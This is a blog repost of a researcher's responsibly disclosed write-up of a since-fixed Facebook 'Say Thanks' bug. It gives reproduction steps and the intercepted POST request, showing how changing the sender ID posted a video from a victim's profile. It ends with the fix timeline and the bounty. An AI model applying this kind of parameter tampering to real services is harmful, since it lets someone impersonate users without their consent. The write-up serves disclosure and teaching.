Facebook Bug allows to post on behalf of anyone | Writeup by Anand Prakash
Labels:
Facebook Bugs
Hello guys, today we have write up of an Indian Security Researcher, Anand Prakash, who found a bug on Facebook which allows him to post on behalf of anyone.
Let me continue this with his own words...
Facebook recently introduced "Say Thanks", an experience that lets Facebook user to create personalized video cards for their facebook friends.
To create a Thanks video, a user needs to visit facebook.com/thanks and have to choose a friend. A user can select a different theme and edit photos and posts that represent their friendship.
Once you are ready you have to click on the "Share" button and your video will be shared on your timeline with the friend tagged. It will show up on your's as well as the friend's timeline.
So, I started digging up as soon as "Say Thanks" was launched.
Below are the few things that I tried :
1) Posting on the behalf of non-Facebook friend.
2) Posting on the behalf of a Facebook friend.
Interestingly, posting on behalf of your Facebook friends worked.
After the successful exploitation a video was posted from victim's profile saying thanks.
Bug type : Insecure direct object reference ( OWASP A4 )
Steps to reproduce:
1) Go to https://www.facebook.com/thanks
2) Choose any friend from your list. Now on the top up corner click on "Share video" option.
3) Now before posting make sure Burp Suite's Interceptor is turned on to capture the request.
Click on "Post Video" now, you will see below kind of
request in Burp suite:
POST /thanks/send/async/ HTTP/1.1
Host: www.facebook.com
fb_dtsg=YYYYYY&message_text=Hey Anand, I made you a video to say thanks for being such a good friend. You can make your own at facebook.com/thanks #saythanks&message=Hey @[1234543:Anand], I made you a video to say thanks for being such a good friend.
You can make your own at facebook.com/thanks #saythanks&cache_version=24&content=[]&content_count=0&receiver={"id":1234543,"fbid":1234543,"name":"Anand Prakash","imageURL":"","gender":2,"greeting":"Hey Anand","shortName":"Anand","relationship":-1," relationshipName":null,"firstName":"Anand","genderType ":"MALE","profilePhoto":"","profilePhotoID":8359028035," profilePhotoBegin":"}& sender={"id ": 131232524 ,"name":"Sangwan Manisha","firstName":"Manisha","genderType":"FEMALE"
,"profilePhoto":"","profilePhotoID":,"profilePhotoBegin":"","profilePhotoBeginID":328985902339}
×tamp=1417279810172&theme_details={}
&theme_id=DEFAULT_THEME&privacyx=9238943&__
user=1234543__a=1&__dyn=&__req=13&ttstamp=__rev=1512134
4) I changed the sender={id=XXXXX to victim's Facebook ID (here XXXXX) and in few seconds video got posted from the victim's Facebook profile.
Timeline:
==========
Nov 14, 2014 12:41am - Report Sent to Facebook Security team
Nov 14, 2014 2:00am - Initial Reply from Mordecai saying he is not able to reproduce the issue
Nov 14, 2014 8:17am - Confirmation of vulnerability from Neal Poole
Nov 14, 2014 10:42am - Issued fixed by Facebook
Nov 14, 2014 11:44am - Fix verification by me
Nov 19, 2014 10:10am - Bounty of $12,500 awarded by Facebook.
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment